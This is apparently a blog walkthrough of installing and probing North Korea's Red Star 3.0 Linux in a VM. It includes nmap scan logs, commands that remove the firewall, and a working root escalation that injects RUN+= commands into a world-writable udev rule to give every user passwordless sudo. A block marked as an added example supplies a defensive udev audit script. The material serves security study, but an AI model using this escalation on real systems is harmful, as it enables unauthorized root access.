
Hands on with North Korea’s official Red Star 3.0 Server linux operating system


About North Korea’s Red Star 3.0 Server OS

Red Star OS, North Korea’s official Red Hat/Fedora-based Linux distro, is very easy to install in a VM. Given recent revelations of its many inherent security flaws, it’s an excellent opportunity to install the operating system in a local VM and then pound it for vulnerability assessment. At the very least, this will let you derive a baseline vulnerability footprint irrespective of any firewalls or security protection devices that a real North Korean target may be running.

The Red Star 3.0 Server version can be downloaded from several websites (including archive.org) and via various torrents. Version 3.0 was released in the summer of 2013 but as of 2015, version 2.5 is still widely used by North Korean organizations. The V3.0 distro includes a branded version of the Firefox browser (renamed “Naenara” which translates to “my country”), Wine for running Windows, and uses a KDE desktop which closely resembles Apple’s OS X desktop interface (prior Red Star versions mimicked the Windows XP user interface – Kim Jong Un’s change to a Mac likely prompted the interface change in the official North Korean OS).

Out of the box, network settings are not configured for conventional DNS and likely point to North Korea-controlled name resolution. You’ll have to use IP addresses throughout the system until DNS is configured.

Installation of Red Star 3.0 Server in a VM Player virtual machine

I installed Red Star 3.0 as a VM Player virtual machine.  Mount the downloaded ISO image to a virtual CDROM and choose Red Hat Enterprise 6.0 or Fedora as the VM Player operating system template.  I would suggest leaving any file sharing options turned off for now (you’ll probably want to keep this VM as isolated as possible until we know more about it).

Click through the first screen (click the blue button on the right).  You will likely receive a warning dialog box.  I cannot read Korean but I’m assuming the warning is probably informing you that the hard drive will be reformatted.  Either that or you just granted permission for Kim Jong Un to retrieve and use anything inside this OS installation.

Start the Red Star 3.0 Server installation

 

If at any point you need help, click the question-mark icon (kidding, everything is in North Korean language).

Red Star 3.0 Server help

 

On this screen, choose the default installation location.  Click on the hard drive icon first to select it and then click the Next button (blue button on the bottom-right).

Click the hard drive icon to select it

 

Fill in the next screen which asks for your name, username, password (twice) and a password reminder phrase.  Click the Next button.

Fill in user information

 

This is the network settings screen.  Enter a PC name in the top right box.  DHCP is not selected by default, so you may want to turn it on using the second option in the top-left dropdown list box.  Or leave it as is and let it break on purpose if you’re worried about network connectivity through an enemy-controlled operating system.

Enter network information.  Select DHCP to enable.

 

Select your location from the dropdown box.  I don’t know what the locations are but I’m guessing that South Korea is not in the list.

Select your location from the dropdown listbox

 

Set the time and time zone (more on the weird date/time below).

 

Select time and time zone or leave Red Star default

 

This is the final screen before the installation begins.  Click the blue button on the right and the install starts.

Final screen before Red Star 3.0 begins installing

 

In the screenshot below, Red Star 3.0 OS is installing.  It will take around 10-15 minutes for the installation to complete.

Red Star 3.0 installing

 

Here comes the bootloader…

Red Star 3.0 bootloader

Below is the splash screen you’ll see while the OS is booting up.

Red Star 3.0 bootup splash screen

 

Press ESC during bootup to watch the logs.

Press ESC during Red Star 3.0 bootup to view messages

 

After the installation completes and the OS boots, you will be greeted with the login screen.  Enter the password you created during the installation and click the blue-highlighted button on the right to log into the system.

Red Star 3.0 login screen

 

Getting around Red Star 3.0 Linux (a few interesting tidbits)

Once the login process has completed and the OS has scanned your machine and sent all your personal information to North Korean authorities, you will be presented with the official Red Star desktop interface. Uh, yeah, I was surprised too – the interface is not bad at all.

Red Star 3.0 desktop resembled Apple OS X

 

Clicking the Red Star (how clever) at the top-right of the desktop drops down the menu.

Menus in Red Star 3.0

 

If you get lost, just remember that the button on the left is “Cancel” while the button on the right is the affirmative OK button.

Cancel and OK dialog boxes in Red Star 3.0

 

Here is what the file explorer looks like.

File Explorer in Red Star 3.0

 

And here’s a peek at default permissions on a file.

File permissions in Red Star 3.0

 

The web browser is a branded Firefox (I have networking disabled at this point).  It launches and attempts to load 10.76.1.11.  WTF!  Yeah, that’s a private internal IP address it’s trying to load right off the bat.  As it turns out, this IP is the proverbial “mothership”.  Researchers have found that tracking, malware reports, crash reports, etc. are all automatically sent to this private network address.

Firefox web browser in Red Star 3.0

 

Interestingly, note the year (104) on the calendar.  According to PC World:

“The operating system uses North Korea’s Juche calendar, which was introduced in 1997. The first recorded day in history is Kim Il-sung’s date of birth on April 15, 1912. 1912 was year 1. This means that 2014 is year 103 in Red Star OS.”

Strange calendar in Red Star 3.0

 

Tweaking Red Star 3.0 – let there be English

The system ships with root disabled by default but given the known vulnerabilities in the system, there are a few ways to get root access.

Once root access is obtained, you can run the following as root, reboot, and the system will be in English.  The system will warn you about kernel files changing but you can safely ignore the warning or disable the check using “rm /usr/share/autostart/intcheck_kde.desktop”.

sed -i 's/ko_KP/en_US/g' /etc/sysconfig/i18n
sed -i 's/ko_KP/en_US/g' /usr/share/config/kdeglobals

Then clear iptables with this command and reboot to reset the allowed outgoing ports (Red Star ships with most outgoing ports blocked).

rm /etc/sysconfig/iptables

In case you are curious, below is the contents of passwd.  Note that most accounts are set to “nologin”.

Contents of passwd on default Red Star 3.0 install

 

You can open a terminal shell window through the explorer.  Drill through the menu hierarchy below and double-click the final terminal window icon.

Another way to get a shell in Red Star 3.0

 

 

Hacking Red Star 3.0

Getting root on Red Star 3.0

Do an “ls -al” in the /etc/udev/rules.d directory.  Oh my, this *does* look interesting.  A world-writable rules file in /etc/udev/rules.d (udev is the device manager for Linux)?  Did they really leave an HP LaserJet rule file wide open?  This means you can inject commands into this file and they will execute with escalated privileges on system boot.  North Korea made a similar mistake on an earlier version of Red Star.  It’s mind-boggling how idiotic this mistake is but I cannot think of any reason why they’d purposefully allow this vulnerability in the OS.

Red Star 3.0 linux has world writable 85-hplj10xx.rules file

On my download, su was available but sudo was not.  If you attempt to sudo, you get this:


Of course, sudo would be nice to have so let’s grab it.

Script to enable sudo on Red Star Linux

To enable sudo, create the following script in your home directory and name it enablesudo.sh.  This will modify the unsecured HP rule file (85-hplj10xx.rules) to include a “RUN+=” argument that makes udev execute a command as root.  Here’s the entire script:

#!/bin/bash -e
# keep a copy of the original rule file so it can be restored after the reboot
cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/myroot.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
# this script is what udev runs at boot; it restores the rule file afterwards
cat <<EOF >/tmp/myroot.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
EOF
chmod +x /tmp/myroot.sh
echo "Need to reboot to get sudo"
sleep 2
reboot

Change permissions to allow the script to execute and run it via:

./enablesudo.sh

The script will run and automatically reboot the VM.  After the reboot, you should be able to use sudo to get root access on Red Star.

Why this works

Since the 85-hplj10xx.rules file is writable, you can pretty much inject all sorts of RUN+= stuff in there.  For instance, you can edit the file and insert lines such as these:

RUN+="/bin/cp /usr/bin/konsole /tmp/myroot.sh"

RUN+="/bin/chmod 4755 /tmp/myroot.sh"

Then reboot and run /tmp/myroot.sh to get a konsole terminal.

This bears repeating – anything you add with the RUN+= construct will execute with escalated privileges when the system is booted.

Or skip the script altogether

Even easier than the script above, you can simply add a RUN+= line to the bottom of the 85-hplj10xx.rules file that executes a script – and that script will be run with root-level privileges.  Then we can simply add whatever is needed to the script file and reboot the system to run it with escalated privileges.

For instance, the /etc/sudoers file is read-only by default, but by adding a script call to the 85-hplj10xx.rules file we can escalate our privileges and easily add ALL to sudoers.

First, create a file in the /tmp directory containing the single command below.  We put the file in the /tmp directory because the directory is open to all users on the system.  Change the file permissions to allow execute (chmod 4744).  This command will insert the appropriate line into sudoers to allow ALL to sudo to root.

echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers

Next we need to run the script file with root privileges.  Insert the line below at the bottom of the 85-hplj10xx.rules file.  Upon booting, this line will kick off the bash shell and run the shell script above with the escalated privileges the script needs in order to insert ALL into the sudoers configuration file.

RUN+="/bin/bash /tmp/myroot.sh"

Then reboot and do a simple sudo to get root access.


Note that we can sudo even though the passwd file contains /sbin/nologin for the root user (see dump of /etc/passwd in screenshot above).
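Before moving on to the scans, here is the defender-side counterpart to the udev finding above, as an added example that is not code from the original post: it walks a udev rules directory, flags rule files that a non-root user could edit and RUN+= directives whose command references a world-writable directory, and applies the permission fix. The function names and the sample rules directory it builds are my own constructions; it assumes GNU stat -c and grep -o.

```shell
#!/bin/bash
# Added example, not from the original post. Audits a udev rules directory for
# the weakness described above: udev executes RUN+= programs as root at boot,
# so a rule file that any user can edit, or a RUN+= target living in a
# world-writable directory (/tmp and friends), hands root to a local user.
# Assumes GNU stat -c and grep -o (Linux userland).

# Print one finding per line ("KIND file detail"); prints nothing when clean.
#   $1 = rules directory, $2 = expected owner of rule files (default root)
audit_udev_rules() {
    dir="$1"; expected_owner="${2:-root}"
    for f in "$dir"/*.rules; do
        [ -f "$f" ] || continue
        perms=$(stat -c '%A' "$f")    # symbolic mode, e.g. -rw-rw-rw-
        owner=$(stat -c '%U' "$f")

        # 6th and 9th characters of the symbolic mode are the group and
        # other write bits; either one lets a non-root user append a rule.
        case "$perms" in
            ?????w????|????????w?) echo "WRITABLE $f $perms" ;;
        esac
        [ "$owner" = "$expected_owner" ] || echo "OWNER $f $owner"

        # For every RUN+="..." directive, flag any word of the command that
        # points into a directory every local user can write to.
        grep -o 'RUN[^+=]*+="[^"]*"' "$f" | while IFS= read -r line; do
            cmd=${line#*=\"}; cmd=${cmd%\"}
            for word in $cmd; do
                case "$word" in
                    /tmp/*|/var/tmp/*|/dev/shm/*)
                        echo "RUNTMP $f $word"; break ;;
                esac
            done
        done
    done
}

# Remediation for the file-permission finding: drop group/other write bits.
# On a real system also run "chown root:root" on the files; that needs root,
# so it is left out of this runnable example.
fix_rule_perms() {
    for f in "$1"/*.rules; do
        [ -f "$f" ] || continue
        chmod go-w "$f"
    done
}

# Constructed sample directory mirroring the Red Star finding: one properly
# locked-down rule and one world-writable printer rule that runs a script
# from /tmp. Prints the directory path.
make_sample_rules() {
    d=$(mktemp -d)
    printf '%s\n' 'ACTION=="add", SUBSYSTEM=="net", RUN+="/sbin/ifup %k"' \
        > "$d/50-safe.rules"
    chmod 644 "$d/50-safe.rules"
    printf '%s\n' '# constructed sample of the world-writable HP rule' \
        'ACTION=="add", SUBSYSTEM=="usb", RUN+="/bin/bash /tmp/myroot.sh"' \
        > "$d/85-hplj10xx.rules"
    chmod 666 "$d/85-hplj10xx.rules"
    echo "$d"
}

# Run with --demo to see the audit before and after the fix on the sample;
# on a live system call: audit_udev_rules /etc/udev/rules.d
if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample_rules)
    echo "== before fix =="; audit_udev_rules "$d" "$(id -un)"
    fix_rule_perms "$d"
    echo "== after fix =="; audit_udev_rules "$d" "$(id -un)"
    rm -rf "$d"
fi
```

Note that after the chmod the RUN+= line pointing into /tmp is still reported: the permission fix closes the write path, but the rule itself has to be removed or rewritten before the host is clean.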

nmap scans

Below is output from a few nmap scans.  nmap was run directly against the OS/VM (no firewall to bypass or anything like that).

Quick scan – Red Star 3.0 system baseline

As you can see, out of the box the system ships in a locked-down state.  Even installed services (e.g. snort, ssh) must be turned on and the firewall rules tweaked before the system will be of much use.

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-12 16:33 CST
Nmap scan report for 192.168.111.134
Host is up (0.00017s latency).
Not shown: 989 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   closed http
135/tcp  closed msrpc
139/tcp  open   netbios-ssn
443/tcp  closed https
445/tcp  open   microsoft-ds
548/tcp  closed afp
631/tcp  closed ipp
5900/tcp closed vnc
MAC Address: 00:0C:29:5A:AC:23 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.77 seconds

 Comprehensive scan – Red Star 3.0 system baseline

nmap -sS -n -sU -A -v -PE -PP -PS -PA -PU -PY 192.168.111.134

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-12 22:17 CST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:17
Scanning 192.168.111.134 [1 port]
Completed ARP Ping Scan at 22:17, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:17
Scanning 192.168.111.134 [1000 ports]
Discovered open port 139/tcp on 192.168.111.134
Discovered open port 445/tcp on 192.168.111.134
Completed SYN Stealth Scan at 22:17, 4.70s elapsed (1000 total ports)
Initiating UDP Scan at 22:17
Scanning 192.168.111.134 [1000 ports]
Discovered open port 137/udp on 192.168.111.134
Discovered open port 5353/udp on 192.168.111.134
Completed UDP Scan at 22:17, 3.92s elapsed (1000 total ports)
Initiating Service scan at 22:17
Scanning 995 services on 192.168.111.134
Service scan Timing: About 0.60% done
Service scan Timing: About 2.61% done; ETC: 00:03 (1:42:29 remaining)
Service scan Timing: About 4.62% done; ETC: 23:47 (1:25:16 remaining)
Service scan Timing: About 6.63% done; ETC: 23:40 (1:17:25 remaining)
Service scan Timing: About 8.64% done; ETC: 23:37 (1:12:45 remaining)
Service scan Timing: About 12.16% done; ETC: 23:26 (1:00:12 remaining)
Service scan Timing: About 12.66% done; ETC: 23:34 (1:06:26 remaining)
Service scan Timing: About 16.18% done; ETC: 23:26 (0:57:30 remaining)
Service scan Timing: About 16.68% done; ETC: 23:32 (1:01:51 remaining)
Service scan Timing: About 20.20% done; ETC: 23:26 (0:54:43 remaining)
Service scan Timing: About 26.13% done; ETC: 23:26 (0:50:47 remaining)
Service scan Timing: About 30.65% done; ETC: 23:26 (0:47:17 remaining)
Service scan Timing: About 36.18% done; ETC: 23:26 (0:43:50 remaining)
Service scan Timing: About 42.21% done; ETC: 23:26 (0:39:41 remaining)
Service scan Timing: About 48.24% done; ETC: 23:26 (0:35:32 remaining)
Service scan Timing: About 54.27% done; ETC: 23:26 (0:31:22 remaining)
Service scan Timing: About 60.30% done; ETC: 23:26 (0:27:14 remaining)
Service scan Timing: About 66.33% done; ETC: 23:26 (0:23:06 remaining)
Service scan Timing: About 72.36% done; ETC: 23:26 (0:18:57 remaining)
Service scan Timing: About 78.39% done; ETC: 23:26 (0:14:49 remaining)
Service scan Timing: About 84.42% done; ETC: 23:26 (0:10:41 remaining)
Service scan Timing: About 90.15% done; ETC: 23:26 (0:06:47 remaining)
Service scan Timing: About 96.18% done; ETC: 23:26 (0:02:38 remaining)
Service scan Timing: About 99.10% done; ETC: 23:27 (0:00:38 remaining)
Completed Service scan at 23:26, 4128.55s elapsed (995 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.134
Retrying OS detection (try #2) against 192.168.111.134
Retrying OS detection (try #3) against 192.168.111.134
Retrying OS detection (try #4) against 192.168.111.134
Retrying OS detection (try #5) against 192.168.111.134
NSE: Script scanning 192.168.111.134.
Initiating NSE at 23:26
NSE Timing: About 2.34% done; ETC: 23:49 (0:21:32 remaining)
NSE Timing: About 4.27% done; ETC: 23:50 (0:22:47 remaining)
NSE Timing: About 4.56% done; ETC: 00:00 (0:31:43 remaining)
NSE Timing: About 6.60% done; ETC: 23:57 (0:28:32 remaining)
NSE Timing: About 8.74% done; ETC: 23:55 (0:26:17 remaining)
NSE Timing: About 10.97% done; ETC: 23:54 (0:24:29 remaining)
NSE Timing: About 14.76% done; ETC: 23:51 (0:20:36 remaining)
NSE Timing: About 19.51% done; ETC: 23:50 (0:19:15 remaining)
NSE Timing: About 24.08% done; ETC: 23:50 (0:18:02 remaining)
NSE Timing: About 30.00% done; ETC: 23:50 (0:16:43 remaining)
NSE Timing: About 36.21% done; ETC: 23:50 (0:15:16 remaining)
NSE Timing: About 42.52% done; ETC: 23:50 (0:13:44 remaining)
NSE Timing: About 48.64% done; ETC: 23:50 (0:12:19 remaining)
NSE Timing: About 54.17% done; ETC: 23:51 (0:11:06 remaining)
NSE Timing: About 59.40% done; ETC: 23:50 (0:09:43 remaining)
NSE Timing: About 64.83% done; ETC: 23:51 (0:08:28 remaining)
NSE Timing: About 70.06% done; ETC: 23:50 (0:07:09 remaining)
NSE Timing: About 75.39% done; ETC: 23:51 (0:05:56 remaining)
NSE Timing: About 80.33% done; ETC: 23:50 (0:04:43 remaining)
NSE Timing: About 85.76% done; ETC: 23:51 (0:03:26 remaining)
NSE Timing: About 91.09% done; ETC: 23:50 (0:02:08 remaining)
NSE Timing: About 96.22% done; ETC: 23:51 (0:00:55 remaining)
Completed NSE at 23:51, 1448.83s elapsed
Nmap scan report for 192.168.111.134
Host is up (0.00026s latency).
Not shown: 991 open|filtered ports, 989 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
80/tcp closed http
135/tcp closed msrpc
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp closed https
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
548/tcp closed afp
631/tcp closed ipp
5900/tcp closed vnc
20/udp closed ftp-data
21/udp closed ftp
80/udp closed http
135/udp closed msrpc
137/udp open netbios-ns Microsoft Windows XP netbios-ssn
139/udp closed netbios-ssn
443/udp closed https
445/udp closed microsoft-ds
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
| Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
| 22/tcp ssh
|_ Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
MAC Address: 00:0C:29:5A:AC:23 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.47%E=4%D=1/12%OT=139%CT=20%CU=20%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=54B4B24C%P=x86_64-unknown-linux-gnu)SEQ(SP=D0%GCD=1%ISR=CC%TI=Z%CI=Z%TS
OS:=A)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=M
OS:5B4ST11NW0%O6=M5B4ST11)WIN(W1=2D40%W2=2D40%W3=2D40%W4=2D40%W5=2D40%W6=2D
OS:40)ECN(R=Y%DF=Y%T=40%W=2DA0%O=M5B4NNSNW0%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=2D40%S=O%A=S+%F=AS%O=M5B4ST11N
OS:W0%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Uptime guess: 0.064 days (since Mon Jan 12 22:19:26 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=208 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: LOCALHOST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: LOCALHOST, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LOCALHOST<00> Flags: <unique><active>
| LOCALHOST<03> Flags: <unique><active>
| LOCALHOST<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a-6.rs3.0)
| Computer name: localhost
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: localhost.localdomain
|_ System time: 2015-01-12T23:43:48+09:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn’t support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.111.134

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5601.04 seconds
Raw packets sent: 4108 (157.698KB) | Rcvd: 88 (6.235KB)

nmap comprehensive scan after iptables removed

nmap -sS -n -sU -A -v -PE -PP -PS -PA -PU -PY 192.168.111.134

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-13 08:19 CST
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 08:19
Scanning 192.168.111.134 [1 port]
Completed ARP Ping Scan at 08:19, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:19
Scanning 192.168.111.134 [1000 ports]
Discovered open port 139/tcp on 192.168.111.134
Discovered open port 445/tcp on 192.168.111.134
Completed SYN Stealth Scan at 08:19, 4.93s elapsed (1000 total ports)
Initiating UDP Scan at 08:19
Scanning 192.168.111.134 [1000 ports]
Discovered open port 137/udp on 192.168.111.134
Discovered open port 5353/udp on 192.168.111.134
Completed UDP Scan at 08:19, 4.27s elapsed (1000 total ports)
Initiating Service scan at 08:19
Scanning 994 services on 192.168.111.134
Service scan Timing: About 0.50% done
Service scan Timing: About 2.52% done; ETC: 10:09 (1:46:35 remaining)
Service scan Timing: About 4.53% done; ETC: 09:51 (1:27:10 remaining)
Service scan Timing: About 6.54% done; ETC: 09:44 (1:18:51 remaining)
Service scan Timing: About 8.55% done; ETC: 09:40 (1:13:37 remaining)
Service scan Timing: About 12.07% done; ETC: 09:29 (1:00:49 remaining)
Service scan Timing: About 12.58% done; ETC: 09:36 (1:06:58 remaining)
Service scan Timing: About 16.10% done; ETC: 09:28 (0:57:52 remaining)
Service scan Timing: About 16.60% done; ETC: 09:34 (1:02:13 remaining)
Service scan Timing: About 20.12% done; ETC: 09:28 (0:54:59 remaining)
Service scan Timing: About 24.55% done; ETC: 09:27 (0:51:20 remaining)
Service scan Timing: About 30.58% done; ETC: 09:27 (0:47:15 remaining)
Service scan Timing: About 36.62% done; ETC: 09:27 (0:43:11 remaining)
Service scan Timing: About 42.15% done; ETC: 09:28 (0:39:46 remaining)
Service scan Timing: About 48.19% done; ETC: 09:28 (0:35:36 remaining)
Service scan Timing: About 54.23% done; ETC: 09:28 (0:31:27 remaining)
Service scan Timing: About 60.26% done; ETC: 09:28 (0:27:17 remaining)
Service scan Timing: About 66.30% done; ETC: 09:28 (0:23:08 remaining)
Service scan Timing: About 72.33% done; ETC: 09:28 (0:18:59 remaining)
Service scan Timing: About 78.37% done; ETC: 09:28 (0:14:50 remaining)
Service scan Timing: About 84.41% done; ETC: 09:28 (0:10:42 remaining)
Service scan Timing: About 90.14% done; ETC: 09:28 (0:06:47 remaining)
Service scan Timing: About 96.18% done; ETC: 09:28 (0:02:38 remaining)
Service scan Timing: About 99.09% done; ETC: 09:29 (0:00:38 remaining)
Completed Service scan at 09:28, 4128.60s elapsed (994 services on 1 host)
Initiating OS detection (try #1) against 192.168.111.134
Retrying OS detection (try #2) against 192.168.111.134
Retrying OS detection (try #3) against 192.168.111.134
Retrying OS detection (try #4) against 192.168.111.134
Retrying OS detection (try #5) against 192.168.111.134
NSE: Script scanning 192.168.111.134.
Initiating NSE at 09:28
NSE Timing: About 2.44% done; ETC: 09:50 (0:20:40 remaining)
NSE Timing: About 4.47% done; ETC: 09:52 (0:22:48 remaining)
NSE Timing: About 6.61% done; ETC: 09:54 (0:24:16 remaining)
NSE Timing: About 8.75% done; ETC: 09:57 (0:25:44 remaining)
NSE Timing: About 12.54% done; ETC: 09:52 (0:21:03 remaining)
NSE Timing: About 12.83% done; ETC: 09:56 (0:23:54 remaining)
NSE Timing: About 17.01% done; ETC: 09:52 (0:19:51 remaining)
NSE Timing: About 23.23% done; ETC: 09:52 (0:18:24 remaining)
NSE Timing: About 29.35% done; ETC: 09:52 (0:17:01 remaining)
NSE Timing: About 35.47% done; ETC: 09:53 (0:15:35 remaining)
NSE Timing: About 41.59% done; ETC: 09:53 (0:14:08 remaining)
NSE Timing: About 46.45% done; ETC: 09:52 (0:12:52 remaining)
NSE Timing: About 52.19% done; ETC: 09:53 (0:11:34 remaining)
NSE Timing: About 57.14% done; ETC: 09:53 (0:10:20 remaining)
NSE Timing: About 62.66% done; ETC: 09:53 (0:09:01 remaining)
NSE Timing: About 67.70% done; ETC: 09:53 (0:07:48 remaining)
NSE Timing: About 72.94% done; ETC: 09:53 (0:06:32 remaining)
NSE Timing: About 77.98% done; ETC: 09:53 (0:05:19 remaining)
NSE Timing: About 83.71% done; ETC: 09:53 (0:03:56 remaining)
NSE Timing: About 88.85% done; ETC: 09:52 (0:02:41 remaining)
NSE Timing: About 94.18% done; ETC: 09:52 (0:01:24 remaining)
Completed NSE at 09:53, 1448.53s elapsed
Nmap scan report for 192.168.111.134
Host is up (0.00022s latency).
Not shown: 990 open|filtered ports, 989 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp closed ftp
22/tcp closed ssh
80/tcp closed http
135/tcp closed msrpc
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp closed https
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
548/tcp closed afp
631/tcp closed ipp
5900/tcp closed vnc
20/udp closed ftp-data
21/udp closed ftp
22/udp closed ssh
80/udp closed http
135/udp closed msrpc
137/udp open netbios-ns Microsoft Windows XP netbios-ssn
139/udp closed netbios-ssn
443/udp closed https
445/udp closed microsoft-ds
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
| Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
| 22/tcp ssh
|_ Address=192.168.111.134 fe80:0:0:0:20c:29ff:fe5a:ac23
MAC Address: 00:0C:29:5A:AC:23 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.47%E=4%D=1/13%OT=139%CT=20%CU=20%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=54B53F5E%P=x86_64-unknown-linux-gnu)SEQ(SP=C6%GCD=1%ISR=D2%TI=Z%CI=Z%TS
OS:=A)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=M
OS:5B4ST11NW0%O6=M5B4ST11)WIN(W1=2D40%W2=2D40%W3=2D40%W4=2D40%W5=2D40%W6=2D
OS:40)ECN(R=Y%DF=Y%T=40%W=2DA0%O=M5B4NNSNW0%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=2D40%S=O%A=S+%F=AS%O=M5B4ST11N
OS:W0%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Uptime guess: 0.482 days (since Mon Jan 12 22:19:26 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: LOCALHOST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: LOCALHOST, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LOCALHOST<00> Flags: <unique><active>
| LOCALHOST<03> Flags: <unique><active>
| LOCALHOST<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a-6.rs3.0)
| Computer name: localhost
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: localhost.localdomain
|_ System time: 2015-01-13T09:32:32+09:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn’t support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.111.134

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5601.67 seconds
Raw packets sent: 4107 (157.670KB) | Rcvd: 89 (6.291KB)

Turn off local firewall on Red Star 3.0

Now that we have root access, we can clear iptables to open up all the outgoing ports.

cd /etc/sysconfig

cp iptables ~/iptables.bak

rm /etc/sysconfig/iptables

 

Additional information

North Korea IP address space

For reference purposes while you’re snooping around the system, North Korea has the following block assigned to them via APNIC: 175.45.176.0/22.

inetnum: 175.45.176.0 - 175.45.179.255
netname: STAR-KP
descr: Ryugyong-dong
descr: Potong-gang District
country: KP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-STAR-KP
mnt-routes: MAINT-STAR-KP
changed: 20091221
source: APNIC

210.52.109.0/24 is also used by North Korea, but is assigned to China Telecom. Lastly, a Russian ISP (SatGate or IntelSat) provides 77.94.35.0/24 to North Korea.

Don’t click this icon!

And whatever you do, for all you hold dear, do *not* click this desktop icon!

Kim Jong Un farting

It hardware-controls the volume of your PC and then produces a Kim Jong Un farting noise.
